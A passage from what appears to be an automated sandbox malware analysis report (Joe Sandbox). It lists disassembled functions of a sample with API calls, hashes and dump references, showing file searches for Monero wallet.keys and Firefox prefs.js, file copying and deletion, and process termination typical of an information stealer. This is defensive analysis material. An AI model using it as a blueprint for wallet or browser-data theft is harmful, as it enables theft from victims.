                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00AE16B0,00AE0D97), ref: 00ACF81E
                                      • StrCmpCA.SHLWAPI(?,00AE16B4), ref: 00ACF86F
                                      • StrCmpCA.SHLWAPI(?,00AE16B8), ref: 00ACF885
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00ACFBB1
                                      • FindClose.KERNEL32(000000FF), ref: 00ACFBC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: 043f7b4a9eb7b5e6df48a1c1bc4600ae5208203f859eae95590f37b2596357ab
                                      • Instruction ID: a0c3f36bd7d3b79fc7a92546c1d2f2752a3c77bea00a073f0a4b1a08213ee74c
                                      • Opcode Fuzzy Hash: 043f7b4a9eb7b5e6df48a1c1bc4600ae5208203f859eae95590f37b2596357ab
                                      • Instruction Fuzzy Hash: 79B12472A101189FCB24FF64DE96FEE7379AF64300F4045AAA44B56291EF309F49CB91
                                      Function 00AC1710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00AE523C,?,?,?,00AE52E4,?,?,00000000,?,00000000), ref: 00AC1963
                                      • StrCmpCA.SHLWAPI(?,00AE538C), ref: 00AC19B3
                                      • StrCmpCA.SHLWAPI(?,00AE5434), ref: 00AC19C9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AC1D80
                                      • DeleteFileA.KERNEL32(00000000), ref: 00AC1E0A
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00AC1E60
                                      • FindClose.KERNEL32(000000FF), ref: 00AC1E72
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: f6b7d4044629500119f28f3058d523b5eca03717470a1d36cf880492093371d4
                                      • Instruction ID: efa6810cb661180c203a11484dcd8366b4349df1b06d5d0a551555e4cf64904c
                                      • Opcode Fuzzy Hash: f6b7d4044629500119f28f3058d523b5eca03717470a1d36cf880492093371d4
                                      • Instruction Fuzzy Hash: 6412DF719101189BCB15EBA0DEA6EEE7379AF64300F4045DBB14766291EF306F89CF61
                                      Function 00ACDF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00AE0C32), ref: 00ACDF5E
                                      • StrCmpCA.SHLWAPI(?,00AE15C0), ref: 00ACDFAE
                                      • StrCmpCA.SHLWAPI(?,00AE15C4), ref: 00ACDFC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00ACE4E0
                                      • FindClose.KERNEL32(000000FF), ref: 00ACE4F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2325840235-1173974218
                                      • Opcode ID: 44678e42a63e0303222093f55a5d6a5b067f3ae04db7834a60323d1a2f4b8c00
                                      • Instruction ID: 6d6ba0fbbc9c4a175a53b56943cdf55bc4c850aa64525a9e3435889602aa299f
                                      • Opcode Fuzzy Hash: 44678e42a63e0303222093f55a5d6a5b067f3ae04db7834a60323d1a2f4b8c00
                                      • Instruction Fuzzy Hash: ADF18C729241189ACB15EB60DEA5EEE7379BF64300F4045DBB04B62291EF306F89CF61
                                      Function 00F12503 Relevance: 14.1, Strings: 10, Instructions: 1649COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: *Bk3$+Rw$<Mz]$F1^$`7S$cPg*$er^$er^*oH$nn$ztuw
                                      • API String ID: 0-3128633582
                                      • Opcode ID: 520418ebd58b43a56b597fecf1b003d507d642cdbe2a1466744d2350ff8436bc
                                      • Instruction ID: 0078ba18389d3aae41e10ba40d2de116e4f4412dc52ab3f0fa91b3ef3513bf36
                                      • Opcode Fuzzy Hash: 520418ebd58b43a56b597fecf1b003d507d642cdbe2a1466744d2350ff8436bc
                                      • Instruction Fuzzy Hash: B4B228F3A0C2149FE304AE2DEC8567AF7E9EF94720F16463DEAC5C7744EA3558018692
                                      Function 00ACDB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00AE15A8,00AE0BAF), ref: 00ACDBEB
                                      • StrCmpCA.SHLWAPI(?,00AE15AC), ref: 00ACDC33
                                      • StrCmpCA.SHLWAPI(?,00AE15B0), ref: 00ACDC49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00ACDECC
                                      • FindClose.KERNEL32(000000FF), ref: 00ACDEDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: d7c81f47261985695c9b4b235d1dddd70c9b1118ee4cecff5b7ef104cbbf81ed
                                      • Instruction ID: 2d2d59e69898aa75b9871bbbaf6c2f16bff67496402ba441df3cb3c46be9ecef
                                      • Opcode Fuzzy Hash: d7c81f47261985695c9b4b235d1dddd70c9b1118ee4cecff5b7ef104cbbf81ed
                                      • Instruction Fuzzy Hash: A3914772A102189BCB14FB70DE56EED737DAF94340F40466EF84796291EE349B48CB92
                                      Function 00AD98E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AD9905
                                      • Process32First.KERNEL32(00AC9FDE,00000128), ref: 00AD9919
                                      • Process32Next.KERNEL32(00AC9FDE,00000128), ref: 00AD992E
                                      • StrCmpCA.SHLWAPI(?,00AC9FDE), ref: 00AD9943
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AD995C
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AD997A
                                      • CloseHandle.KERNEL32(00000000), ref: 00AD9987
                                      • CloseHandle.KERNEL32(00AC9FDE), ref: 00AD9993
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: c19f185db08070b41f5cff2813d25098ce904aed27c88c92addb9e107cbe371d
                                      • Instruction ID: 2c3cc28339e568e0d1323c8b51677cefc47fa8ef2565369222e55575a6c7c08b
                                      • Opcode Fuzzy Hash: c19f185db08070b41f5cff2813d25098ce904aed27c88c92addb9e107cbe371d
                                      • Instruction Fuzzy Hash: AE111F75A14308ABCB24DFA0DC48BDEB778BB48700F00458DF509E6350D7749A84CFA0
                                      Function 00AD7D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,00AE05B7), ref: 00AD7D71
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00AD7D89
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00AD7D9D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00AD7DF2
                                      • LocalFree.KERNEL32(00000000), ref: 00AD7EB2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: 21646119871eda2ba4db3ed3bfa01104c2b35abdac3ba284c2ab0b9b30133cec
                                      • Instruction ID: 5746cfe0446b7b52fea2a61750fd8fee84c34138acd0e2931efd78e1eccf3d19
                                      • Opcode Fuzzy Hash: 21646119871eda2ba4db3ed3bfa01104c2b35abdac3ba284c2ab0b9b30133cec
                                      • Instruction Fuzzy Hash: 39414E71950218ABCB24DB94DD99FEEB774FF58700F1041DAE00AA2290DB746F85CF61
                                      Function 00ACE530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00AE0D79), ref: 00ACE5A2
                                      • StrCmpCA.SHLWAPI(?,00AE15F0), ref: 00ACE5F2
                                      • StrCmpCA.SHLWAPI(?,00AE15F4), ref: 00ACE608
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00ACECDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 433455689-1173974218
                                      • Opcode ID: d54ebf1e8b192e61f1c343c10ae4069ae65497e971cbfcfb817322de1530d477
                                      • Instruction ID: 597d1eae5f5170ad86fb696d02a86e7c38e5b0b029bf86bb20c1567da99c7180
                                      • Opcode Fuzzy Hash: d54ebf1e8b192e61f1c343c10ae4069ae65497e971cbfcfb817322de1530d477
                                      • Instruction Fuzzy Hash: 9612C172A101189BCB14FB60DEA6EED7379AF64300F4045EBB54B56291EF306F49CB62
                                      Function 00F0EF4D Relevance: 9.1, Strings: 6, Instructions: 1605COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
